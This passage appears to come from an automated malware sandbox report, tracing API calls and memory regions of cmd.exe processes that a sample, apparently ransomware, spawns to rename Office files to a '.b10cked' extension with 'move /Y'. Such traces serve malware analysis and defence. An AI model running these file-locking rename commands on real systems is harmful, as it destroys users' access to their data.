lpFilePart=0x1ef188*="MS.GRAPH.14.1033.hxn.b10cked") returned 0x37 [0197.624] SetErrorMode (uMode=0x0) returned 0x1 [0197.624] SetLastError (dwErrCode=0x0) [0197.625] GetFileAttributesW 
(lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GRAPH.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.graph.14.1033.hxn.b10cked")) returned 0xffffffff [0197.625] GetLastError () returned 0x2 [0197.625] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1eeb04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eeb04) returned 0x370e68 [0197.625] FindNextFileW (in: hFindFile=0x370e68, lpFindFileData=0x1eeb04 | out: lpFindFileData=0x1eeb04) returned 0 [0197.625] FindClose (in: hFindFile=0x370e68 | out: hFindFile=0x370e68) returned 1 [0197.625] GetLastError () returned 0x12 [0197.625] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1eeb04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eeb04) returned 0x370e68 [0197.626] FindNextFileW (in: hFindFile=0x370e68, lpFindFileData=0x1eeb04 | out: lpFindFileData=0x1eeb04) returned 0 [0197.626] FindClose (in: hFindFile=0x370e68 | out: hFindFile=0x370e68) returned 1 [0197.626] GetLastError () returned 0x12 [0197.626] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x381bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x381bd8) returned 0x370e68 [0197.626] FindNextFileW (in: hFindFile=0x370e68, lpFindFileData=0x381bd8 | out: lpFindFileData=0x381bd8) returned 0 [0197.626] FindClose (in: hFindFile=0x370e68 | out: hFindFile=0x370e68) returned 1 [0197.627] GetLastError () returned 0x12 [0197.627] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x381bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x381bd8) returned 0x370e68 [0197.627] FindNextFileW (in: hFindFile=0x370e68, lpFindFileData=0x381bd8 | out: 
lpFindFileData=0x381bd8) returned 0 [0197.627] FindClose (in: hFindFile=0x370e68 | out: hFindFile=0x370e68) returned 1 [0197.627] GetLastError () returned 0x12 [0197.627] _get_osfhandle (_FileHandle=2) returned 0xb [0197.627] GetFileType (hFile=0xb) returned 0x2 [0197.627] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0197.627] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1eecd4 | out: lpMode=0x1eecd4) returned 1 [0197.627] _get_osfhandle (_FileHandle=2) returned 0xb [0197.627] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1eed08 | out: lpConsoleScreenBufferInfo=0x1eed08) returned 1 [0197.627] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0197.628] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1eed48 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0197.628] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1eed2c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1eed2c*=0x2c) returned 1 [0197.629] longjmp () [0197.629] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.629] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0197.629] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.629] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0197.629] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.629] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0197.629] SetConsoleInputExeNameW () returned 0x1 [0197.629] GetConsoleOutputCP () returned 0x1b5 [0197.629] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.629] 
SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.629] exit (_Code=1) Process: id = "459" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16980" os_pid = "0xbb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29091 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29092 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29093 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29094 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 29095 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29096 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: 
"c:\\windows\\system32\\ntdll.dll") Region: id = 29097 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29098 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29099 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 29100 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29121 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29122 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29123 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29124 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 29125 start_va = 0x4c0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 29126 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29127 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: 
"c:\\windows\\system32\\kernelbase.dll") Region: id = 29128 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29129 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29130 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29131 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29132 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29133 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29134 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29135 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 29136 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29137 start_va = 0x76ca0000 end_va = 0x76d6bfff 
entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29138 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29139 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 29140 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 29141 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 29142 start_va = 0x5c0000 end_va = 0x6c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 29143 start_va = 0x6d0000 end_va = 0x12cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 29144 start_va = 0x12d0000 end_va = 0x1432fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012d0000" filename = "" Region: id = 29195 start_va = 0x130000 end_va = 0x1effff entry_point = 0x130000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 654 os_tid = 0xcbc [0197.396] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efe84 | out: lpSystemTimeAsFileTime=0x2efe84*(dwLowDateTime=0xaa7b3940, dwHighDateTime=0x1d440a9)) [0197.396] GetCurrentProcessId () returned 0xbb4 [0197.397] GetCurrentThreadId () returned 0xcbc [0197.397] GetTickCount () returned 0x37e81 [0197.397] QueryPerformanceCounter (in: lpPerformanceCount=0x2efe7c | out: lpPerformanceCount=0x2efe7c*=25418578511) returned 1 [0197.397] GetModuleHandleA 
(lpModuleName=0x0) returned 0x4a9c0000 [0197.397] __set_app_type (_Type=0x1) [0197.397] __p__fmode () returned 0x76b331f4 [0197.397] __p__commode () returned 0x76b331fc [0197.397] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0197.397] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0197.398] GetCurrentThreadId () returned 0xcbc [0197.398] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcbc) returned 0x38 [0197.398] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0197.398] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0197.398] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.398] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0197.398] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efe14 | out: phkResult=0x2efe14*=0x0) returned 0x2 [0197.398] VirtualQuery (in: lpAddress=0x2efe4b, lpBuffer=0x2efde4, dwLength=0x1c | out: lpBuffer=0x2efde4*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0197.398] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efde4, dwLength=0x1c | out: lpBuffer=0x2efde4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0197.398] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efde4, dwLength=0x1c | out: lpBuffer=0x2efde4*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0197.398] VirtualQuery (in: lpAddress=0x1f3000, 
lpBuffer=0x2efde4, dwLength=0x1c | out: lpBuffer=0x2efde4*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0197.398] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efde4, dwLength=0x1c | out: lpBuffer=0x2efde4*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0197.398] GetConsoleOutputCP () returned 0x1b5 [0197.398] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.398] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0197.398] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.398] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0197.399] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.399] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0197.399] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.399] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0197.399] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.399] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0197.399] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.399] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0197.399] GetEnvironmentStringsW () returned 0x4d0180* [0197.399] FreeEnvironmentStringsW (penv=0x4d0180) returned 1 [0197.400] GetEnvironmentStringsW () returned 0x4d0180* [0197.400] FreeEnvironmentStringsW (penv=0x4d0180) returned 1 [0197.400] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eed84 | out: phkResult=0x2eed84*=0x40) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: 
lpType=0x2eed8c*=0x0, lpData=0x2eed90*=0xa8, lpcbData=0x2eed88*=0x1000) returned 0x2 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x4, lpData=0x2eed90*=0x1, lpcbData=0x2eed88*=0x4) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x0, lpData=0x2eed90*=0x1, lpcbData=0x2eed88*=0x1000) returned 0x2 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x4, lpData=0x2eed90*=0x0, lpcbData=0x2eed88*=0x4) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x4, lpData=0x2eed90*=0x40, lpcbData=0x2eed88*=0x4) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x4, lpData=0x2eed90*=0x40, lpcbData=0x2eed88*=0x4) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x0, lpData=0x2eed90*=0x40, lpcbData=0x2eed88*=0x1000) returned 0x2 [0197.400] RegCloseKey (hKey=0x40) returned 0x0 [0197.400] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eed84 | out: phkResult=0x2eed84*=0x40) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x0, lpData=0x2eed90*=0x40, lpcbData=0x2eed88*=0x1000) 
returned 0x2 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x4, lpData=0x2eed90*=0x1, lpcbData=0x2eed88*=0x4) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x0, lpData=0x2eed90*=0x1, lpcbData=0x2eed88*=0x1000) returned 0x2 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x4, lpData=0x2eed90*=0x0, lpcbData=0x2eed88*=0x4) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x4, lpData=0x2eed90*=0x9, lpcbData=0x2eed88*=0x4) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x4, lpData=0x2eed90*=0x9, lpcbData=0x2eed88*=0x4) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x0, lpData=0x2eed90*=0x9, lpcbData=0x2eed88*=0x1000) returned 0x2 [0197.400] RegCloseKey (hKey=0x40) returned 0x0 [0197.400] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639f [0197.400] srand (_Seed=0x5b88639f) [0197.400] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.14.1033.hxn.b10cked\"" [0197.401] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.14.1033.hxn.b10cked\"" 
[0197.401] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.401] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4d18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0197.401] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0197.401] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0197.401] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0197.401] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0197.401] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0197.401] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0197.401] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0197.401] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0197.401] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0197.401] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0197.401] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0197.401] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0197.402] GetEnvironmentStringsW () returned 0x4d22d0* [0197.402] FreeEnvironmentStringsW (penv=0x4d22d0) returned 1 [0197.402] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.402] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0197.402] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 
[0197.402] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0197.402] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0197.402] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0197.402] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0197.402] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0197.402] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0197.402] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0197.402] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2efb50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.402] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2efb50, lpFilePart=0x2efb4c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2efb4c*="Desktop") returned 0x18 [0197.402] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0197.402] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef8cc | out: lpFindFileData=0x2ef8cc) returned 0x4d0010 [0197.403] FindClose (in: hFindFile=0x4d0010 | out: hFindFile=0x4d0010) returned 1 [0197.403] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef8cc | out: lpFindFileData=0x2ef8cc) returned 0x4d0010 [0197.403] FindClose (in: hFindFile=0x4d0010 | out: hFindFile=0x4d0010) returned 1 [0197.403] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef8cc | out: lpFindFileData=0x2ef8cc) returned 0x4d0010 [0197.403] FindClose (in: hFindFile=0x4d0010 | out: hFindFile=0x4d0010) returned 1 [0197.403] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0197.403] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0197.403] SetEnvironmentVariableW (lpName="=C:", 
lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0197.403] GetEnvironmentStringsW () returned 0x4d2af0* [0197.403] FreeEnvironmentStringsW (penv=0x4d2af0) returned 1 [0197.403] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.404] GetConsoleOutputCP () returned 0x1b5 [0197.404] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.404] GetUserDefaultLCID () returned 0x409 [0197.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0197.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efc90, cchData=128 | out: lpLCData="0") returned 2 [0197.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efc90, cchData=128 | out: lpLCData="0") returned 2 [0197.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efc90, cchData=128 | out: lpLCData="1") returned 2 [0197.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0197.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0197.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0197.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0197.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0197.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0197.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0197.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0197.405] 
